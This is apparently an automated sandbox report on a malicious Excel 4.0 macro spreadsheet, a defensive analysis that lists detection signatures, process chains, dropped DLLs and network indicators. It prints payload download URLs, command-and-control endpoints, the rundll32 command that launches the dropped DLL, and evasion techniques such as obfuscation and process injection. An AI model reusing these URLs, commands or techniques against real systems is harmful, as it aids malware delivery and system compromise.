Play interactive tour

Edit tour

Analysis Report SecuriteInfo.com.Heur.30497.14031

Overview

General Information

Sample Name:	SecuriteInfo.com.Heur.30497.14031 (renamed file extension from 14031 to xls)
Analysis ID:	344767
MD5:	26f124898bf4a54f4c110bb58b3f38c4
SHA1:	a3eaad9a0cb49e8e12678c9e82d93e53d7d38008
SHA256:	989e829731d55da1c9f0afdcebd1de9df19bfa1ff8935cee7b0eb8f1b5378fc5
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Found malicious Excel 4.0 Macro

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Contains functionality to inject code into remote processes

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Found Excel 4.0 Macro with suspicious formulas

Found abnormal large hidden Excel 4.0 Macro sheet

Found malicious URLs in unpacked macro 4.0 sheet

Found obfuscated Excel 4.0 Macro

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Yara detected hidden Macro 4.0 in Excel

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the product ID of Windows

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

rundll32.exe (PID: 2480 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)

rundll32.exe (PID: 2484 cmdline: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)

msiexec.exe (PID: 2692 cmdline: msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)

cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Heur.30497.xls	JoeSecurity_HiddenMacro	Yara detected hidden Macro 4.0 in Excel	Joe Security

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1464, ProcessCommandLine: 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer, ProcessId: 2480

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Source: 4.2.msiexec.exe.90000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2
Source: 3.2.rundll32.exe.970000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen2

Compliance:

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Uses secure TLS version for HTTPS connections

Show sources

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2

Binary contains paths to debug symbols

Show sources

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000004.00000003.2159256851.00000000022C0000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to behavior

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: scfrd[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\rundll32.exe

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 0000000Ah	3_2_0097D830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	3_2_00988830
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then add esi, 02h	3_2_0098CE40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 00000000h	3_2_0098DA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 0000000Ah	4_2_0009D830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	4_2_000A8830
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then add esi, 02h	4_2_000ACE40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then push 00000000h	4_2_000ADA70

Source: global traffic

DNS query: name: rnollg.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.150.228:443

Networking:

Found malicious URLs in unpacked macro 4.0 sheet

Show sources

Source: before.1.0.0.sheet.csv_unpack

Macro 4.0 Deobfuscator: https://rnollg.com/kev/scfrd.dll

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_00091AF0 InternetReadFile,

4_2_00091AF0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ

Jump to behavior

Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com,. equals www.linkedin.com (Linkedin)
Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: rnollg.com

Source: msiexec.exe, 00000004.00000003.2163545510.000000000076F000.00000004.00000001.sdmp	String found in binary or memory: Https://homesoapmolds.com/post.php
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0K
Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: msiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: D0EE0000.0.dr	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)
Source: SecuriteInfo.com.Heur.30497.xls	String found in binary or memory: http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~
Source: msiexec.exe, 00000004.00000002.2355484698.0000000001ED0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com/CPS0v
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2155690592.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154774311.0000000002117000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: msiexec.exe, 00000004.00000002.2355361210.0000000000732000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/
Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/post.php
Source: msiexec.exe, 00000004.00000002.2355352317.000000000071B000.00000004.00000020.sdmp	String found in binary or memory: https://gadgetswolf.com/post.phpF/
Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmp	String found in binary or memory: https://govemedico.tk/
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: https://govemedico.tk/post.php
Source: msiexec.exe, 00000004.00000002.2356290473.0000000002EC0000.00000004.00000001.sdmp	String found in binary or memory: https://govemedico.tk/t
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: https://homesoapmolds.com/
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: https://homesoapmolds.com/post.php
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: https://homesoapmolds.com/post.phpx
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: before.1.0.0.sheet.csv_unpack	String found in binary or memory: https://rnollg.com/kev/scfrd.dll
Source: SecuriteInfo.com.Heur.30497.xls, D0EE0000.0.dr	String found in binary or memory: https://rnollg.com/kev/scfrd.dll$8
Source: msiexec.exe, 00000004.00000002.2355385935.0000000000770000.00000004.00000020.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: msiexec.exe, 00000004.00000002.2355322925.00000000006EF000.00000004.00000020.sdmp	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443

Source: unknown	HTTPS traffic detected: 172.67.150.228:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.200.147:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.198.109:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.158.184:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Found malicious Excel 4.0 Macro

Show sources

Source: SecuriteInfo.com.Heur.30497.xls

Initial sample: URLDownloadToFileA

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: Enable Content X E14 - "" jR V \ A B C D E F G H I J K L M N O P Q R S T 1 ' Cjdigicert' 3

Found Excel 4.0 Macro with suspicious formulas

Show sources

Source: SecuriteInfo.com.Heur.30497.xls	Initial sample: CALL
Source: SecuriteInfo.com.Heur.30497.xls	Initial sample: CALL

Found abnormal large hidden Excel 4.0 Macro sheet

Show sources

Source: SecuriteInfo.com.Heur.30497.xls

Initial sample: Sheet size: 503434

Found obfuscated Excel 4.0 Macro

Show sources

Source: SecuriteInfo.com.Heur.30497.xls

Initial sample: High usage of CHAR() function: 147

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00979C60	3_2_00979C60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00973A30	3_2_00973A30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0098DA70	3_2_0098DA70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00979A60	3_2_00979A60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00985BF0	3_2_00985BF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A3F8FD	3_2_00A3F8FD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A3D806	3_2_00A3D806
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A3D2C4	3_2_00A3D2C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A3BB6E	3_2_00A3BB6E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A3DD48	3_2_00A3DD48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_00099C60	4_2_00099C60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_00093A30	4_2_00093A30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_00099A60	4_2_00099A60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_000ADA70	4_2_000ADA70
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4_2_000A5BF0	4_2_000A5BF0

Source: Joe Sandbox View	Dropped File: C:\ProgramData\formnet.dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll 0BF22B8F9AAEF21AFE71FCBBEA62325E7582DAD410B0A537F38A9EB8E6855890

Source: suicy.dll.4.dr

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: rundll32.exe, 00000002.00000002.2155279240.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2154626174.0000000001F30000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal100.expl.evad.winXLS@7/12@4/4

Source: C:\Windows\SysWOW64\msiexec.exe

Code function: 4_2_000A9C90 AdjustTokenPrivileges,

4_2_000A9C90

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_009869A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

3_2_009869A0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\D0EE0000

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{6564EBFF-51EC-A92E-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{451CDBFF-61EC-8956-3E66-73D0C2BEFC46}
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\{F5F5D963-6370-39BF-3E66-73D0C2BEFC46}

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD2B9.tmp

Jump to behavior

Source: SecuriteInfo.com.Heur.30497.xls

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: c:\PlanetAllow\OpenRoll\cellNumeral\money.pdb source: msiexec.exe, 00000004.00000003.2159256851.00000000022C0000.00000004.00000001.sdmp, scfrd[1].dll.0.dr

Source: SecuriteInfo.com.Heur.30497.xls

Initial sample: OLE summary lastprinted = 2021-01-26 16:17:13

Source: SecuriteInfo.com.Heur.30497.xls

Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 3_2_0097D830 LoadLibraryA,GetProcAddress,

3_2_0097D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0099E9FA push esi; retf	3_2_0099EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0099D1F2 push dword ptr [ecx]; iretd	3_2_0099D1F9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_009982EB push eax; ret	3_2_0099834A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00999A5D push ebp; iretd	3_2_00999AEF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0099EA51 push esi; retf	3_2_0099EABE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A393ED push ecx; ret	3_2_00A39400
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0099B56F push esp; ret	3_2_0099B581
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0099B700 push ss; ret	3_2_0099B735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_00A52B73 push esi; ret	3_2_00A52B75

Persistence and Installation Behavior:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\ProgramData\formnet.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Ida\suicy.dll	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\ProgramData\formnet.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
